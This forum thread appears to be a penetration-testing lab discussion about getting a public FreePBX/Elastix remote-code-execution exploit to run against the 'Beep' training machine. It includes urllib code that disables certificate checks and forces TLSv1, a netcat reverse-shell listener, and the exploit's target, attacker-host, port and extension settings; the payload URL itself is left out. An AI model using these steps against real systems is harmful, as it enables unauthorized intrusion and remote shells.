I would like to start with a thanks to whoever may solve this one for me.
So as my pen-testing studies go from one machine to another, I encountered something that I found very interesting.
I was looking for another way to exploit FreePBX 2.8.1.4 (which is the version the machine is currently running), and it is somehow related to Elastix 2.2.0, which I don't completely understand: how are these two combined to work?
(Is FreePBX the OS, and is Elastix the web application?)
So I found this exploit that actually has a video proof of working.
ippsec did the same with another exploit that matches the versions involved here, and from reading the exploit itself, it seems legit.
So why, when I try to apply this exploit to this machine (Beep), does it fail?
Didn't watch the video, but the error message in your screenshot states that urllib didn't like the (potentially self-signed) TLS certificate. You might need to tell urllib to simply ignore the certificate: python ignore certificate validation urllib2 - Stack Overflow
@HomeSen said:
Didn't watch the video, but the error message in your screenshot states that urllib didn't like the (potentially self-signed) TLS certificate. You might need to tell urllib to simply ignore the certificate: python ignore certificate validation urllib2 - Stack Overflow
Dear HomeSen, thank you for your time.
I don't understand how I can tell Python to ignore the TLS cert.
Here is the full exploit code (I added .requests to the original code since it gave me an error without this).
I would really appreciate it if you could show me what you meant.
All you need to do is add import ssl at the beginning of the script and extend the urlopen() call with an additional parameter:
urllib.request.urlopen(url, context=ssl._create_unverified_context())
Strange. -Out of curiosity: Is the service even running on HTTPS?-
Sounds like the server is using an old SSL-/TLS-protocol version. Can you run sslscan against the server and post the output, please?
Well, it runs on HTTPS. The "not secure" is usually due to self-signed certificates.
The server seems to only allow old/insecure protocols, so you need to explicitly tell urllib to also use one of those old protocols:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
urllib.request.urlopen(url, context=ctx)
That way, urllib should use TLSv1.0 and also ignore the self-signed certificate.
Regarding Discord, you can reach me under: HomeSen#8275
But I can't promise to be more responsive than here, due to work and kids
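The context HomeSen describes above, built without the deprecated ssl.PROTOCOL_TLSv1 constant and driven by the protocol table that sslscan prints. This is an added example, not code from any poster in this thread: the sslscan sample is constructed in the sslscan 2.x layout, the function names are hypothetical, and the SECLEVEL=0 cipher string assumes an OpenSSL build that otherwise refuses TLS 1.0/1.1.

```python
import re
import ssl

# Constructed sample in the sslscan 2.x "SSL/TLS Protocols" layout
# (not output from the machine discussed in this thread).
SAMPLE_SSLSCAN = """\
  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.1   disabled
TLSv1.2   disabled
TLSv1.3   disabled
"""

ANSI = re.compile(r"\x1b\[[0-9;]*m")  # sslscan colours its terminal output
ROW = re.compile(r"^\s*((?:SSL|TLS)v[\d.]+)\s+enabled\s*$", re.M)

# sslscan names mapped to versions the ssl module can pin. SSLv2/SSLv3 are
# left out: current OpenSSL builds normally cannot negotiate them at all.
VERSIONS = {
    "TLSv1.0": ssl.TLSVersion.TLSv1,
    "TLSv1.1": ssl.TLSVersion.TLSv1_1,
    "TLSv1.2": ssl.TLSVersion.TLSv1_2,
    "TLSv1.3": ssl.TLSVersion.TLSv1_3,
}

def enabled_protocols(report):
    """Return the protocol names an sslscan report marks as enabled."""
    return ROW.findall(ANSI.sub("", report))

def legacy_context(report):
    """Client context pinned to the newest version the server offers."""
    usable = [VERSIONS[p] for p in enabled_protocols(report) if p in VERSIONS]
    if not usable:
        raise ValueError("server offers nothing Python's ssl module can speak")
    best = max(usable)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # has to be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE  # self-signed lab cert: no validation
    ctx.minimum_version = best
    ctx.maximum_version = best
    if best < ssl.TLSVersion.TLSv1_2:
        # Assumption: OpenSSL only allows TLS 1.0/1.1 at security level 0.
        ctx.set_ciphers("DEFAULT@SECLEVEL=0")
    return ctx
```

The returned context goes into the same urllib.request.urlopen(url, context=ctx) call shown above.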
I am so thankful for all of your help!
The code finally got executed with no errors!
Unfortunately, after nc -lvp 443 there was not any connection established.
I am more happy that the code actually ran than the exploit itself didn't work (lol)
I will see you at the Discord
You are awesome!
Thank you!
This exploit works with the updated code supplied by HomeSen. The issue is the extension.
After looking into the extensions with sipvicious_svwar and not really getting anything concrete, I decided to loop through some extensions to see if I could get a connection. I got a shell while connecting to extension 233.
Using the code in here you would just change the extension to 233.
rhost = "10.10.10.7"
lhost = "10.10.14.13"
lport = 443
extension = "233"
url = "https payload"
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
urllib.request.urlopen(url, context=ctx)
If the extension is not connecting, here is the code I used to find a connectable extension. I just looped through a bunch of extensions, looking for a connection.